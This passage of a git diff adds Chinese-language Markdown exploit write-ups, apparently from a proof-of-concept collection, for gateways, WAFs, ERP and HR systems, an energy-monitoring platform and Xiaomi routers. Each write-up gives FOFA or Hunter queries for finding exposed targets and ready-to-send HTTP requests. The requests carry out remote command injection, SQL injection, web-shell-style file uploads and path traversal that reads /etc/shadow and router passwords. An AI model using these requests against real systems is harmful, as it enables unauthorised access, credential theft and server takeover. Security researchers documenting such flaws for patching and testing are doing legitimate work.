+![1703405938768-9fa01d85-610c-4b95-a221-8a3363171080.png](./img/pzDedjkOanQCgUGN/1703405938768-9fa01d85-610c-4b95-a221-8a3363171080-647356.png)
+
+
+
+> 更新: 2024-07-17 17:28:17  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pb2c1ioegdqi8aft>
\ No newline at end of file
diff --git a/安恒明御安全网关aaa_portal_auth_wchat_submit存在远程命令执行漏洞.md b/安恒明御安全网关aaa_portal_auth_wchat_submit存在远程命令执行漏洞.md
new file mode 100644
index 0000000..82af1c9
--- /dev/null
+++ b/安恒明御安全网关aaa_portal_auth_wchat_submit存在远程命令执行漏洞.md
@@ -0,0 +1,41 @@
+# 安恒明御安全网关aaa_portal_auth_wchat_submit存在远程命令执行漏洞
+
+# 一、漏洞简介
+安恒信息明御安全网关<font style="color:rgb(0, 0, 0);">（以下简称“NGFW”）秉持安全可视、简单有效的理念，以资产为视角，构建“事前+事中+事后”全流程防御的下一代安全防护体系，并融合传统防火墙、</font>入侵防御系统<font style="color:rgb(0, 0, 0);">、防病毒网关、上网行为管控、VPN网关、威胁情报等</font>安全模块<font style="color:rgb(0, 0, 0);">于一体的智慧化安全网关。安恒明御安全网关aaa_portal_auth_wchat_submit存在远程命令执行漏洞。攻击者可通过该漏洞获取服务器权限。</font>
+
+# <font style="color:rgb(0, 0, 0);">二、影响版本</font>
++ 安恒明御安全网关
+
+# 三、资产测绘
++ hunter`app.name="安恒明御安全网关"`
++ 特征
+
+![1699939786628-0b13cd03-210c-4d73-9fb2-6198942e15c3.png](./img/z7xlIRA9OLdIal4a/1699939786628-0b13cd03-210c-4d73-9fb2-6198942e15c3-021806.png)
+
+# 四、漏洞复现
+```plain
+GET /webui/?g=aaa_portal_auth_wchat_submit&suffix=;echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/stc.txt|ls HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+Host: {hostname}
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1703405909643-3e3d865b-260e-419a-b697-5ed23a0a0ecd.png](./img/z7xlIRA9OLdIal4a/1703405909643-3e3d865b-260e-419a-b697-5ed23a0a0ecd-625580.png)
+
+获取命令执行结果
+
+```plain
+GET /sslvpn/stc.txt HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+Host: {hostname}
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1703405938768-9fa01d85-610c-4b95-a221-8a3363171080.png](./img/z7xlIRA9OLdIal4a/1703405938768-9fa01d85-610c-4b95-a221-8a3363171080-616701.png)
+
+
+
+> 更新: 2024-02-29 23:57:16  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dyx9hn4tquve8vku>
\ No newline at end of file
diff --git a/安恒明御安全网关sslvpn_client存在远程命令执行漏洞.md b/安恒明御安全网关sslvpn_client存在远程命令执行漏洞.md
new file mode 100644
index 0000000..fb5ec3a
--- /dev/null
+++ b/安恒明御安全网关sslvpn_client存在远程命令执行漏洞.md
@@ -0,0 +1,41 @@
+# 安恒明御安全网关sslvpn_client存在远程命令执行漏洞
+
+# 一、漏洞简介
+安恒信息明御安全网关<font style="color:rgb(0, 0, 0);">（以下简称“NGFW”）秉持安全可视、简单有效的理念，以资产为视角，构建“事前+事中+事后”全流程防御的下一代安全防护体系，并融合传统防火墙、</font>入侵防御系统<font style="color:rgb(0, 0, 0);">、防病毒网关、上网行为管控、VPN网关、威胁情报等</font>安全模块<font style="color:rgb(0, 0, 0);">于一体的智慧化安全网关。安恒明御安全网关sslvpn_client存在远程命令执行漏洞。攻击者可通过该漏洞获取服务器权限。</font>
+
+# <font style="color:rgb(0, 0, 0);">二、影响版本</font>
++ 安恒明御安全网关
+
+# 三、资产测绘
++ hunter`app.name="安恒明御安全网关"`
++ 特征
+
+![1699939786628-0b13cd03-210c-4d73-9fb2-6198942e15c3.png](./img/pZPH-MQGPlAnSTs8/1699939786628-0b13cd03-210c-4d73-9fb2-6198942e15c3-374710.png)
+
+# 四、漏洞复现
+```plain
+GET /sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+Host: xx.xx.xx.xx
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1699939901505-2723aaa1-8c25-4f6b-9817-bdf3c6dd715a.png](./img/pZPH-MQGPlAnSTs8/1699939901505-2723aaa1-8c25-4f6b-9817-bdf3c6dd715a-272346.png)
+
+获取命令执行结果
+
+```plain
+GET /sslvpn/ceshi.txt HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+Host: xx.xx.xx.xx
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1699939937228-26653126-7961-44ef-bda2-0622411e755d.png](./img/pZPH-MQGPlAnSTs8/1699939937228-26653126-7961-44ef-bda2-0622411e755d-150327.png)
+
+
+
+> 更新: 2024-02-29 23:57:16  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dg8qpqumcbgb7vgs>
\ No newline at end of file
diff --git a/安盟华御应用防护系统sslvpn_client存在远程命令执行漏洞.md b/安盟华御应用防护系统sslvpn_client存在远程命令执行漏洞.md
new file mode 100644
index 0000000..dacde64
--- /dev/null
+++ b/安盟华御应用防护系统sslvpn_client存在远程命令执行漏洞.md
@@ -0,0 +1,39 @@
+# 安盟华御应用防护系统sslvpn_client存在远程命令执行漏洞
+
+# 一、漏洞简介
+安盟华御应用防护系统sslvpn_client存在远程命令执行漏洞，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 安盟华御应用防护系统
+
+# 三、资产测绘
++ fofa`body="./webui/js/jquerylib/" && icon_hash="-507802195"`
++ 特征![1701771919319-68c717ea-9581-4f52-a6b8-6fe95f714b73.png](./img/I4OS9Z4oQbmjVm3B/1701771919319-68c717ea-9581-4f52-a6b8-6fe95f714b73-598996.png)
+
+# 四、漏洞复现
+```java
+GET /sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+Host: xx.xx.xx.xx
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1701762310844-e2bb6845-f268-450b-b1ef-4ddc2f30876e.png](./img/I4OS9Z4oQbmjVm3B/1701762310844-e2bb6845-f268-450b-b1ef-4ddc2f30876e-372549.png)
+
+获取命令执行结果
+
+```java
+GET /sslvpn/ceshi.txt HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+Host: xx.xx.xx.xx
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1701762342384-224cbced-19ed-428d-b26d-9957865251d2.png](./img/I4OS9Z4oQbmjVm3B/1701762342384-224cbced-19ed-428d-b26d-9957865251d2-769183.png)
+
+
+
+> 更新: 2024-02-29 23:57:12  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cmv6rdoy8wqokzle>
\ No newline at end of file
diff --git a/安科瑞环保用电监管云平台GetEnterpriseInfoById存在SQL注入漏洞.md b/安科瑞环保用电监管云平台GetEnterpriseInfoById存在SQL注入漏洞.md
new file mode 100644
index 0000000..46dc7fd
--- /dev/null
+++ b/安科瑞环保用电监管云平台GetEnterpriseInfoById存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+# 安科瑞环保用电监管云平台GetEnterpriseInfoById存在SQL注入漏洞
+
+AcrelCloud-3000环保用电监管云平台依托创新的物联网电力传感技术，实时采集企业总用电、生产设备及环保治理设备用电数据，通过关联分析、超限分析、停电分析、停限产分析，结合及时发现环保治理设备未开启、异常关闭及减速、空转、降频等异常情况，同时通过数据分析还可以实时监控限产和停产整治企业运行状态，用户可以利用PC、手机、平板电脑等多种终端实现对平台的访问。
+
+## fofa
+
+```javascript
+body="myCss/phone.css"
+```
+
+## poc
+
+```javascript
+GET /MainMonitor/GetEnterpriseInfoById?EnterpriseId=%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x716a627871%2C0x647a457071654e45644d4c627a716c4d7948505a4d67756a786c70576a5a4f7749627a5449486562%2C0x7178767171%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+Accept: */*
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+![image-20241128094044951](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411280940008.png)
\ No newline at end of file
diff --git a/安科瑞环保用电监管云平台etEnterpriseInfoY存在SQL注入漏洞.md b/安科瑞环保用电监管云平台etEnterpriseInfoY存在SQL注入漏洞.md
new file mode 100644
index 0000000..a00acd4
--- /dev/null
+++ b/安科瑞环保用电监管云平台etEnterpriseInfoY存在SQL注入漏洞.md
@@ -0,0 +1,26 @@
+# 安科瑞环保用电监管云平台etEnterpriseInfoY存在SQL注入漏洞
+
+AcrelCloud-3000环保用电监管云平台依托创新的物联网电力传感技术，实时采集企业总用电、生产设备及环保治理设备用电数据，通过关联分析、超限分析、停电分析、停限产分析，结合及时发现环保治理设备未开启、异常关闭及减速、空转、降频等异常情况，同时通过数据分析还可以实时监控限产和停产整治企业运行状态，用户可以利用PC、手机、平板电脑等多种终端实现对平台的访问。
+
+## fofa
+
+```javascript
+body="myCss/phone.css"
+```
+
+## poc
+
+```javascript
+POST /MainMonitor/GetEnterpriseInfoY HTTP/1.1
+Host: 
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip, deflate
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept: text/plain, */*; q=0.01
+
+EnterpriseId=2107265665700008%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cuser%28%29%29%29and%27&Type=4
+```
+
+![image-20241227215812734](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272158792.png)
\ No newline at end of file
diff --git a/安科瑞环保用电监管云平台newLogin存在SQL注入漏洞.md b/安科瑞环保用电监管云平台newLogin存在SQL注入漏洞.md
new file mode 100644
index 0000000..77fe6e3
--- /dev/null
+++ b/安科瑞环保用电监管云平台newLogin存在SQL注入漏洞.md
@@ -0,0 +1,30 @@
+# 安科瑞环保用电监管云平台newLogin存在SQL注入漏洞
+
+AcrelCloud-3000环保用电监管云平台依托创新的物联网电力传感技术，实时采集企业总用电、生产设备及环保治理设备用电数据，通过关联分析、超限分析、停电分析、停限产分析，结合及时发现环保治理设备未开启、异常关闭及减速、空转、降频等异常情况，同时通过数据分析还可以实时监控限产和停产整治企业运行状态，用户可以利用PC、手机、平板电脑等多种终端实现对平台的访问。
+
+## fofa
+
+```javascript
+body="myCss/phone.css"
+```
+
+## poc
+
+```javascript
+POST /Home/newLogin HTTP/1.1
+Host: 
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Priority: u=0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Content-Length: 193
+
+data=AmILgROn2omEYq%2Bd8Urox8DW%2F8rRQwsBzOEz00K3cyMY1DhHq6oDzKni9uNo6p7VIuEZBk0edl%2Blr8MukZeYaoj5ogyFWf1wJQ6iDSwIHOKSdk2%2BRRo%2FbhB70T5AlQ3PB6Ca1I6PvvVefK%2BuEF6b%2BqnvUH5y0gix7tq3yw1WJdc%3D
+```
+
+![image-20241129104833102](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411291048146.png)
+
+![image-20241129104733314](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411291047374.png)
\ No newline at end of file
diff --git a/宏景-DisplayFiles任意文件读取.md b/宏景-DisplayFiles任意文件读取.md
new file mode 100644
index 0000000..5d098ec
--- /dev/null
+++ b/宏景-DisplayFiles任意文件读取.md
@@ -0,0 +1,20 @@
+## 宏景DisplayFiles任意文件读取
+
+## fofa
+```
+app="HJSOFT-HCM"
+```
+
+## poc
+```
+POST /templates/attestation/../../servlet/DisplayFiles HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+
+filepath=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT
+```
+![image](https://github.com/wy876/POC/assets/139549762/3466b302-c1fc-42c9-929f-5d35500f13bd)
+
+### 加解密工具
+https://github.com/vaycore/HrmsTool 
diff --git a/宏景人力资源信息管理系统uploadLogo存在任意文件上传漏洞.md b/宏景人力资源信息管理系统uploadLogo存在任意文件上传漏洞.md
new file mode 100644
index 0000000..4010227
--- /dev/null
+++ b/宏景人力资源信息管理系统uploadLogo存在任意文件上传漏洞.md
@@ -0,0 +1,89 @@
+# 宏景人力资源信息管理系统uploadLogo存在任意文件上传漏洞
+宏景人力资源信息管理系统uploadLogo存在任意文件上传漏洞，可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
+
+## hunter
+```javascript
+app.name="宏景 HCM"
+```
+
+## poc
+1、获取cookie
+
+```java
+GET /module/system/qrcard/mobilewrite/qrcardmain.jsp HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1730773798906-c8ff7525-ae32-4aba-9f46-3941013a3ed1.png)
+
+2、获取上传路径
+
+```java
+POST /sys/cms/uploadLogo.do?b_upload=upload&isClose=2&type=1 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
+Cookie: JSESSIONID=3199B98D03F1834F83CDAF45EA079D13
+Content-Type:multipart/form-data; boundary=----WebKitFormBoundaryfjKBvGWJbG07Z02r
+
+------WebKitFormBoundaryfjKBvGWJbG07Z02r
+Content-Disposition: form-data; name="path"
+
+
+------WebKitFormBoundaryfjKBvGWJbG07Z02r
+Content-Disposition: form-data; name="lfType"
+
+0
+------WebKitFormBoundaryfjKBvGWJbG07Z02r
+Content-Disposition: form-data; name="logofile"; filename=""
+Content-Type: image/gif
+
+<%= "bttest1" %>
+------WebKitFormBoundaryfjKBvGWJbG07Z02r
+Content-Disposition: form-data; name="twoFile"; filename=""
+Content-Type: image/gif
+
+<%= "bttest1" %>
+------WebKitFormBoundaryfjKBvGWJbG07Z02r--
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1730773863549-7fb35968-9e26-40b2-ae25-54b275c9d806.png)
+
+3、文件上传
+
+```java
+POST /sys/cms/uploadLogo.do?b_upload=upload&isClose=2&type=1 HTTP/1.1
+Host: 8.137.169.49:7000
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
+Cookie: JSESSIONID=163CC9FFC3CAAEAFCF07F29B294E99F0
+Content-Type:multipart/form-data; boundary=----WebKitFormBoundaryfjKBvGWJbG07Z02r
+
+------WebKitFormBoundaryfjKBvGWJbG07Z02r
+Content-Disposition: form-data; name="path"
+
+D~3a~5cTomcat~39~5cwebapps~5cROOT~5ctest1.jsp
+------WebKitFormBoundaryfjKBvGWJbG07Z02r
+Content-Disposition: form-data; name="lfType"
+
+0
+------WebKitFormBoundaryfjKBvGWJbG07Z02r
+Content-Disposition: form-data; name="logofile"; filename=""
+Content-Type: image/gif
+
+<%= "bttest1" %>
+------WebKitFormBoundaryfjKBvGWJbG07Z02r
+Content-Disposition: form-data; name="twoFile"; filename=""
+Content-Type: image/gif
+
+<%= "bttest1" %>
+------WebKitFormBoundaryfjKBvGWJbG07Z02r--
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1730773904485-b641a3a5-ca59-4bc8-bfdf-e00f229fbd30.png)
+
+4、访问/test123.jsp
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1730773974901-93ca11e0-40df-493e-bee1-ac24a62bea27.png)
+
+
+
diff --git a/宏脉医美行业管理系统config存在目录遍历漏洞.md b/宏脉医美行业管理系统config存在目录遍历漏洞.md
new file mode 100644
index 0000000..cfe927f
--- /dev/null
+++ b/宏脉医美行业管理系统config存在目录遍历漏洞.md
@@ -0,0 +1,25 @@
+# 宏脉医美行业管理系统config存在目录遍历漏洞
+
+# 一、漏洞简介
+宏脉医美行业管理系统是由宏脉信息技术（广州）股份有限公司开发的一款服务于医美行业管理服务的系统.宏脉医美行业管理系统config存在目录遍历漏洞
+
+# 二、影响版本
++ 宏脉医美行业管理系统
+
+# 三、资产测绘
++ hunter`web.title="宏脉医美行业管理系统"`
++ 特征
+
+![1704262762802-ebd6b894-53ce-40a3-b2bb-ac6ab6dec428.png](./img/rNM2nXI92D5k_q50/1704262762802-ebd6b894-53ce-40a3-b2bb-ac6ab6dec428-973442.png)
+
+# 四、漏洞复现
+```plain
+/config
+```
+
+![1706786956453-a3b09163-fd17-47ea-ab3e-99f586bc9e0a.png](./img/rNM2nXI92D5k_q50/1706786956453-a3b09163-fd17-47ea-ab3e-99f586bc9e0a-778894.png)
+
+
+
+> 更新: 2024-02-29 23:55:43  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/era5zxcl98y54nu2>
\ No newline at end of file
diff --git a/宝塔云WAFserver_name存在SQL注入漏洞.md b/宝塔云WAFserver_name存在SQL注入漏洞.md
new file mode 100644
index 0000000..5f446e3
--- /dev/null
+++ b/宝塔云WAFserver_name存在SQL注入漏洞.md
@@ -0,0 +1,40 @@
+# 宝塔云WAF server_name存在SQL注入漏洞
+
+# 一、漏洞简介
+免费的私有云WAF防火墙 堡塔云WAF经过千万级用户认证、为您的业务保驾护航 采用反向代理的方式,网站流量先抵达堡塔云WAF 经过堡塔云WAF检测和过滤后，再转给原来提供服务的网站服务器。堡塔云WAF是一个开源的Web应用程序防火墙，它可以保护网站免受SQL注入，XSS，CSRF，SSRF，命令注入，代码注入，本地文件包含，远程文件包含等攻击 兼容ARM和国产系统。堡塔云WAF server_name 接口处存在SQL注入漏洞,恶意攻击者可能会利用此漏洞修改数据库中的数据，例如添加、删除或修改记录，导致数据损坏或丢失。
+
+# 二、影响版本
++ 堡塔云WAF
+
+# 三、资产测绘
+```plain
+title=="404 - Website not exist!"
+```
+
+![1716743462186-060cdafd-f235-444f-add4-509093fc03bb.png](./img/F3T28ybLHGApE49W/1716743462186-060cdafd-f235-444f-add4-509093fc03bb-402365.png)
+
+# 四、漏洞复现
+```plain
+GET /get_site_status?server_name='-extractvalue(1,concat(0x5c,123456789))-'1 HTTP/2
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Length: 0
+```
+
+![1716743506890-41bf9b47-7da0-49f2-a79d-e2eccbe791ac.png](./img/F3T28ybLHGApE49W/1716743506890-41bf9b47-7da0-49f2-a79d-e2eccbe791ac-585749.png)
+
+sqlmap:
+
+```plain
+GET /get_site_status?server_name=1 HTTP/2
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Length: 0
+```
+
+![1716743771618-53fc5769-795f-4889-beb4-3138047c77d0.png](./img/F3T28ybLHGApE49W/1716743771618-53fc5769-795f-4889-beb4-3138047c77d0-630594.png)
+
+
+
+> 更新: 2024-06-01 11:17:59  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ck7t8ensptmf97se>
\ No newline at end of file
diff --git a/富通天下外贸ERPUploadEmailAttr存在任意文件上传漏洞.md b/富通天下外贸ERPUploadEmailAttr存在任意文件上传漏洞.md
new file mode 100644
index 0000000..346447a
--- /dev/null
+++ b/富通天下外贸ERPUploadEmailAttr存在任意文件上传漏洞.md
@@ -0,0 +1,49 @@
+# 富通天下外贸ERP UploadEmailAttr存在任意文件上传漏洞
+
+# 一、漏洞简介
+富通天下外贸ERP基于二维界面管理功能，用户可对客户进行精细化的服务和跟踪，客户基本情况、邮件往来样品寄送记录、报价记录、定金收款情况等，信息脉络化，外贸管理软件让您全方位俯瞰客户管理。该系统存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 富通天下外贸ERP
+
+# 三、资产测绘
++ fofa`title="用户登录_富通天下外贸ERP"`
++ 特征
+
+![1713317155013-b6ef7c19-c580-49fc-b352-d4cd4f06a47e.png](./img/9M-_KrPGGCIelEMF/1713317155013-b6ef7c19-c580-49fc-b352-d4cd4f06a47e-088702.png)
+
+# 四、漏洞复现
+```plain
+POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+
+<% @ webhandler language="C#" class="AverageHandler" %>
+using System;
+using System.Web;
+public class AverageHandler : IHttpHandler
+{
+public bool IsReusable
+{ get { return true; } }
+public void ProcessRequest(HttpContext ctx)
+{
+ctx.Response.Write("hello");
+}
+}
+```
+
+![1713317237034-4f5b8a5e-4517-4159-a8dc-98dc7538b480.png](./img/9M-_KrPGGCIelEMF/1713317237034-4f5b8a5e-4517-4159-a8dc-98dc7538b480-766000.png)
+
+文件上传位置
+
+```plain
+/JoinfWebFile/temp/emailatta/202404/20240417D636C4D1F279410CB324E1AFFE28B141.ashx
+```
+
+![1713317277788-4eb77664-b181-480c-9914-8a1b6082429a.png](./img/9M-_KrPGGCIelEMF/1713317277788-4eb77664-b181-480c-9914-8a1b6082429a-053808.png)
+
+
+
+> 更新: 2024-04-17 14:59:07  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zy1m23vzu6i6aq36>
\ No newline at end of file
diff --git a/小米路由器任意文件读取漏洞.md b/小米路由器任意文件读取漏洞.md
new file mode 100644
index 0000000..9b0fd17
--- /dev/null
+++ b/小米路由器任意文件读取漏洞.md
@@ -0,0 +1,40 @@
+# 小米路由器任意文件读取漏洞
+
+# 一、漏洞简介
+小米路由器是一款高配的智能路由器,具备强大的扩展,并且具备高速传输的特点,其传输速度最高可以达到866M,相比普通150M/300M的普通无线路由器具备更高无线传输速率。小米路由器系统任意文件读取漏洞
+
+# 二、影响版本
++ 小米路由器
+
+# 三、资产测绘
+```plain
+app="小米路由器"
+```
+
+![1717231971362-917b53db-2985-4d7c-8a42-118940873a2c.png](./img/Qww4sdoQYgfh-0gQ/1717231971362-917b53db-2985-4d7c-8a42-118940873a2c-622952.png)
+
+# 四、漏洞复现
+```plain
+GET /api-third-party/download/extdisks../etc/shadow HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
+Accept-Encoding: gzip, deflate
+```
+
+![1717231994318-8206991d-9a44-4abd-9620-1259bfb61336.png](./img/Qww4sdoQYgfh-0gQ/1717231994318-8206991d-9a44-4abd-9620-1259bfb61336-319945.png)
+
+读取登录密码
+
+```plain
+GET /api-third-party/download/extdisks../etc/config/account HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
+Accept-Encoding: gzip, deflate
+```
+
+![1717233232303-77763c87-be53-47c2-9d2d-07df3e961f46.png](./img/Qww4sdoQYgfh-0gQ/1717233232303-77763c87-be53-47c2-9d2d-07df3e961f46-241369.png)
+
+
+
+> 更新: 2024-06-11 10:30:33  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/slv3fogu0wvlvht3>
\ No newline at end of file
diff --git a/山石网科云鉴安全管理系统ajaxActions接口处存在远程命令执行漏洞.md b/山石网科云鉴安全管理系统ajaxActions接口处存在远程命令执行漏洞.md
new file mode 100644
index 0000000..9199b4f
--- /dev/null
+++ b/山石网科云鉴安全管理系统ajaxActions接口处存在远程命令执行漏洞.md
@@ -0,0 +1,62 @@
+# 山石网科云鉴安全管理系统ajaxActions接口处存在远程命令执行漏洞
+
+# 一、产品简介
+<font style="color:rgb(51, 51, 51);">山石网科是中国网络安全行业的技术创新领导厂商</font><sup><font style="color:rgb(51, 102, 204);"> </font></sup><font style="color:rgb(51, 51, 51);">，自成立以来为金融、政府、互联网、教育、医疗卫生等行业的超过26000家客户提供高效、稳定的安全防护服务。山石网科云鉴安全管理系统ajaxActions接口处存在远程命令执行漏洞,可导致系统被攻击者执行任意命令。</font>
+
+# <font style="color:rgb(0, 0, 0);">二、影响版本</font>
++ 山石网科云鉴安全管理系统
+
+# <font style="color:rgb(0, 0, 0);">三、资产测绘</font>
++ fofa`body=山石云鉴主机安全管理系统||icon_hash="572290418"`
++ 特征
+
+![1715078394101-31b6a8b4-b52f-42ab-8636-c684e2531bb7.png](./img/wxEwBAW_TIPk5zJS/1715078394101-31b6a8b4-b52f-42ab-8636-c684e2531bb7-365277.png)
+
+# 四、漏洞复现
+1. 获取token与cookie
+
+```plain
+GET /master/ajaxActions/getTokenAction.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Accept-Encoding: gzip, deflate, br
+```
+
+![1715157818803-e44a7f91-955e-4399-a150-3f3d7ecdd258.png](./img/wxEwBAW_TIPk5zJS/1715157818803-e44a7f91-955e-4399-a150-3f3d7ecdd258-372501.png)
+
+2. 使用上一步获取的token与cookie执行命令
+
+```plain
+POST /master/ajaxActions/setSystemTimeAction.php?token_csrf=a64cca09285de26ca4ebfefa629edd02 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Length: 90
+Accept: */*
+Accept-Encoding: gzip, deflate, br
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Cookie: PHPSESSID=3ovusd429biqeot6ioje7q06r0
+
+param=os.system('echo 8888881 > /opt/var/majorsec/installation/master/runtime/img/config')
+```
+
+![1715157802540-1acb09fb-b3fc-48b6-a0fc-64f1c542d681.png](./img/wxEwBAW_TIPk5zJS/1715157802540-1acb09fb-b3fc-48b6-a0fc-64f1c542d681-368550.png)
+
+2. 获取命令执行结果
+
+```plain
+GET /master/img/config HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Connection: close
+Accept-Encoding: gzip, deflate, br
+```
+
+![1715157874584-965625d3-c321-4dab-87f4-fefe9baa380c.png](./img/wxEwBAW_TIPk5zJS/1715157874584-965625d3-c321-4dab-87f4-fefe9baa380c-568641.png)
+
+
+
+> 更新: 2024-05-20 13:57:29  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ktu0gkdf8p351xdi>
\ No newline at end of file
diff --git a/山石网科应用防火墙WAF未授权命令注入漏洞.md b/山石网科应用防火墙WAF未授权命令注入漏洞.md
new file mode 100644
index 0000000..8d14f7c
--- /dev/null
+++ b/山石网科应用防火墙WAF未授权命令注入漏洞.md
@@ -0,0 +1,45 @@
+# 山石网科应用防火墙WAF未授权命令注入漏洞
+
